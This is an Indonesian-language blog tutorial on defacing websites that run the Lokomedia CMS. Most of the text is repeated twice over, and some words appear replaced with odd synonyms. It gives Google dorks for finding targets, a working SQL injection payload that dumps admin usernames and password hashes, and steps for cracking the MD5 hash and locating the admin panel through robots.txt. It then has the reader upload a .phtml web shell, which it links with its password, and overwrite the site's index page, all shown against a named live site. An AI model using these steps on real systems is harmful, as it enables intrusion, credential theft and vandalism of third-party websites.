Bimbingan Deface Dengan Cara Sql Lokomedia Terbaru 2019
Oh iya ane mau share cara deface lg nih , tetapi dengan cara yg berlawanan :v , kali ini ane share cara deface dengan cara SQL LOKOMEDIA :v
Oh iya sebelom ane ksih tau tutornya , ane mau nanya neh :v , Klean smua malem jumat ini ngapain aja >:( , jangan jangan ........... ahh sudahlah lupakan :v ... Yuk disimak caranya :V
Bahan Bahan :
#Dork : inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html [ Kembangin lagi dorknya semoga dpet web yg vuln, oh iya ane ksih tau nih klo mau kembangin dork ini tinggal ubah aja ANGKA nya ]
#Bagi yg blom pnya shell format .phtml bisa di download disini ~> httрѕ://uрlоаdfіlеѕ.іо/72uрn
password shellnya : akugans
#Exploit :
'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
#Admin finder online/admin finder tools jg boleh :v
#oh ea , tawaran ane sih sambil dengerin musik Marshmello :v
Caranya :
1. seperti lazimnya kita buka google trus masukin dork yg diatas , trus pilih salah satu websitenya namun cari yg ada halaman statisnya :v, lihat gambar :v
2. nah ane udh dapet targetnya nih, kan di url target tertulis
httр://ѕеwаkurѕіmеjаmurаh.соm/ѕtаtіѕ-1-рrоfіl.html
ada statis-1-profil.html kan? nih liat gambar
3. nah pas sehabis angka sisipkan exploitnya maka akan jadi seperti ini
httр://ѕеwаkurѕіmеjаmurаh.соm/ѕtаtіѕ-1'/*!50000unіоn*/+/*!50000ѕеlесt*/+mаkе_ѕеt(6,@:=0x0а,(ѕеlесt(1)frоm(uѕеrѕ)whеrе@:=mаkе_ѕеt(511,@,0x3C6C693E,uѕеrnаmе,раѕѕwоrd)),@)--+-рrоfіl.html
[ setelah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd.....] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v
4. kan udh ente ctrl+u tuh , nah sekarang liat disitu tertulis admin,09....... nah itu ia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA
5. ok kita kan udh tau nih ya kan username sama passwordnya yg msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yg di samping kanan tabrakan pena admin, nah copy angkanya saatnya kita hash online passwordnya di httрѕ://hаѕhkіllеr.со.uk/md5-dесrурtеr.аѕрx ,,, nah dan jreng jreng ane udh sukses nih gan dapet password aslinya :v,Untuk liat password aslinya nnti akan timbul di sebelah kanan, nih liat gambar
6. nah kan udh dapet password aslinya tuh, sekarang kita cari dimana admin loginnya, bisa pke adminfinder online, mampu juga pke admin finder tools :v, mampu juga pke cara manual nih ane ajarin , caranya
*misalkan web ini : httр://ѕеwаkurѕіmеjаmurаh.соm
*Kita tambahkan /robots.txt di selesai urlnya maka akan jadi gini httр://ѕеwаkurѕіmеjаmurаh.соm/rоbоtѕ.txt
nah pas kita tambahkan /robots.txt maka akan muncul goresan pena
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yg goresan pena disallow nya, karna itu disallownya /adminw36 memiliki arti halaman admin login ada di httр://ѕеwаkurѕіmеjаmurаh.соm/аdmіnw36 ] , paham kan? liat gambar :v
7. sekarang kita coba login dengan username sama password yg udh kita hash tadi , halaman admin login ada disini httр://ѕеwаkurѕіmеjаmurаh.соm/аdmіnw36 klo udh berhasil msk maka penampilan nya akan seperti ini
8. Daaaaan Boom!!! kita udh sukses masuk selaku admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanem shellnya gomna? iya santai ane jelasin :v
OK , dimana kawasan buat tanem shellnya? lihat gesekan pena [ Media Trus Pilih Download ] kan? nah disitu kita tanem shellnya , lihat gambar :v
9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane gausah tanem lg ea :v , skrg kita klik tabrakan pena [ Tambah Download ] , Nah trus pilih deh shell lu , tampilannya kya gini :v
10. INGET BRO BACA BAIK BAIK : upload shellnya mesti format .phtml
jadi yg blom punya udh ane sediain tuh diatas link buat download shellnya :v
11. ok klo shell udh berhasil ke upload kini kita cari jalan masuk shellnya/ bisa dikatakan dimana shell lu berada caranya? ok gini caranya kita cukup tambahkan /files/namashelllu . jadi kaya gini httр://ѕеwаkurѕіmеjаmurаh.соm/fіlеѕ/ѕhеll.рhtml [ Nah yg Shell.phtml itu lu ubah aja sesuaikan dengan nama shell yg udh lu upload tadi gan :v ... nah dan jreng jreng ane udh ketemu nih jalan masuk shellnya lihat gambar :v
hehe terserah deh mau diapain :v , Tebas index jg gapapa :v
TAPI INGAT klo mau tebang index , diusahakan di backup indexnya kasihan adminnya membuatscript indexnya lag :'(
Kalo mau jadi bajingan jadi sekalian jangan tanggung tanggung , tetapi kalo mau jadi bajingan tapi tidak yakin mending jangan
h3h3 udh itu aja ya :v, ok cukup sekian tutor dari ane, ane akan share share cara deface yg lainnya , see you next time guys :v
Oh іуа klо аdа lіnk аtаu gаmbаr уg gа munсul аtаu аdа уg gа ngеrtі bіѕа lаngѕung kоntаk аnе
Oh iya sebelom ane ksih tau tutornya , ane mau nanya neh :v , Klean smua malem jumat ini ngapain aja >:( , jangan jangan ........... ahh sudahlah lupakan :v ... Yuk disimak caranya :V
Bahan Bahan :
#Dork : inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html [ Kembangin lagi dorknya semoga dpet web yg vuln, oh iya ane ksih tau nih klo mau kembangin dork ini tinggal ubah aja ANGKA nya ]
#Bagi yg blom pnya shell format .phtml bisa di download disini ~> httрѕ://uрlоаdfіlеѕ.іо/72uрn
password shellnya : akugans
#Exploit :
'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
#Admin finder online/admin finder tools jg boleh :v
#oh ea , tawaran ane sih sambil dengerin musik Marshmello :v
Caranya :
1. seperti lazimnya kita buka google trus masukin dork yg diatas , trus pilih salah satu websitenya namun cari yg ada halaman statisnya :v, lihat gambar :v
2. nah ane udh dapet targetnya nih, kan di url target tertulis
httр://ѕеwаkurѕіmеjаmurаh.соm/ѕtаtіѕ-1-рrоfіl.html
ada statis-1-profil.html kan? nih liat gambar
3. nah pas sehabis angka sisipkan exploitnya maka akan jadi seperti ini
httр://ѕеwаkurѕіmеjаmurаh.соm/ѕtаtіѕ-1'/*!50000unіоn*/+/*!50000ѕеlесt*/+mаkе_ѕеt(6,@:=0x0а,(ѕеlесt(1)frоm(uѕеrѕ)whеrе@:=mаkе_ѕеt(511,@,0x3C6C693E,uѕеrnаmе,раѕѕwоrd)),@)--+-рrоfіl.html
[ setelah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd.....] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v
4. kan udh ente ctrl+u tuh , nah sekarang liat disitu tertulis admin,09....... nah itu ia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA
5. ok kita kan udh tau nih ya kan username sama passwordnya yg msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yg di samping kanan tabrakan pena admin, nah copy angkanya saatnya kita hash online passwordnya di httрѕ://hаѕhkіllеr.со.uk/md5-dесrурtеr.аѕрx ,,, nah dan jreng jreng ane udh sukses nih gan dapet password aslinya :v,Untuk liat password aslinya nnti akan timbul di sebelah kanan, nih liat gambar
6. nah kan udh dapet password aslinya tuh, sekarang kita cari dimana admin loginnya, bisa pke adminfinder online, mampu juga pke admin finder tools :v, mampu juga pke cara manual nih ane ajarin , caranya
*misalkan web ini : httр://ѕеwаkurѕіmеjаmurаh.соm
*Kita tambahkan /robots.txt di selesai urlnya maka akan jadi gini httр://ѕеwаkurѕіmеjаmurаh.соm/rоbоtѕ.txt
nah pas kita tambahkan /robots.txt maka akan muncul goresan pena
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yg goresan pena disallow nya, karna itu disallownya /adminw36 memiliki arti halaman admin login ada di httр://ѕеwаkurѕіmеjаmurаh.соm/аdmіnw36 ] , paham kan? liat gambar :v
7. sekarang kita coba login dengan username sama password yg udh kita hash tadi , halaman admin login ada disini httр://ѕеwаkurѕіmеjаmurаh.соm/аdmіnw36 klo udh berhasil msk maka penampilan nya akan seperti ini
8. Daaaaan Boom!!! kita udh sukses masuk selaku admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanem shellnya gomna? iya santai ane jelasin :v
OK , dimana kawasan buat tanem shellnya? lihat gesekan pena [ Media Trus Pilih Download ] kan? nah disitu kita tanem shellnya , lihat gambar :v
9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane gausah tanem lg ea :v , skrg kita klik tabrakan pena [ Tambah Download ] , Nah trus pilih deh shell lu , tampilannya kya gini :v
10. INGET BRO BACA BAIK BAIK : upload shellnya mesti format .phtml
jadi yg blom punya udh ane sediain tuh diatas link buat download shellnya :v
11. ok klo shell udh berhasil ke upload kini kita cari jalan masuk shellnya/ bisa dikatakan dimana shell lu berada caranya? ok gini caranya kita cukup tambahkan /files/namashelllu . jadi kaya gini httр://ѕеwаkurѕіmеjаmurаh.соm/fіlеѕ/ѕhеll.рhtml [ Nah yg Shell.phtml itu lu ubah aja sesuaikan dengan nama shell yg udh lu upload tadi gan :v ... nah dan jreng jreng ane udh ketemu nih jalan masuk shellnya lihat gambar :v
hehe terserah deh mau diapain :v , Tebas index jg gapapa :v
TAPI INGAT klo mau tebang index , diusahakan di backup indexnya kasihan adminnya membuatscript indexnya lag :'(
Kalo mau jadi bajingan jadi sekalian jangan tanggung tanggung , tetapi kalo mau jadi bajingan tapi tidak yakin mending jangan
h3h3 udh itu aja ya :v, ok cukup sekian tutor dari ane, ane akan share share cara deface yg lainnya , see you next time guys :v
Oh іуа klо аdа lіnk аtаu gаmbаr уg gа munсul аtаu аdа уg gа ngеrtі bіѕа lаngѕung kоntаk аnе
Posting Komentar untuk "Bimbingan Deface Dengan Cara Sql Lokomedia Terbaru 2019"